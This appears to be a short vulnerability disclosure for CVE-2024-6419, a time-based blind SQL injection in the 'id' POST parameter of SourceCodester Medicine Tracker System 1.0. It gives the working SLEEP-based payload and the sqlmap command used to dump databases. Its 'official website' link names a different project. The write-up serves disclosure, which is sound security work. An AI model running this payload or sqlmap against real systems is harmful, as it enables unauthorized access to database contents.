SQL Injection vulnerability was discovered from Sourcecodester Medicine Tracker System (Master.php)

CVE-2024-6419

A vulnerability classified as critical was found in SourceCodester Medicine Tracker System 1.0. This vulnerability affects unknown code of the file /classes/Master.php?f=save_medicine. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-270010 is the identifier assigned to this vulnerability.

Affected Project: Sourcecodester Medicine Tracker System 1.0

Official Website: https://www.sourcecodester.com/php/15689/food-ordering-management-system-php-and-mysql-free-source-code.html

Version: 1.0

Related Code file: /php-mts/classes/Master.php

Injection parameter: POST parameter ‘id’ is vulnerable

Demonstration

Below is /php-mts/app/?page=medicines/manage_medicine:

Let’s intercept the the traffic using Burp Suite:

After saving the request as master.txt, we will run sqlmap towards it:

POST parameter ‘id’ is found to be vulnerable. Below is the payload used:

---
Parameter: id (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=' AND (SELECT 8594 FROM (SELECT(SLEEP(5)))EJYb) AND 'npqn'='npqn&name=teest&description=test
---

sqlmap -r master.txt --batch --dbs

👨‍💻👾👨‍💻👾👨‍💻👾

Explorer

CVE-2024-6419

SQL Injection vulnerability was discovered from Sourcecodester Medicine Tracker System (Master.php)

CVE-2024-6419

Demonstration

Graph View

Table of Contents

Backlinks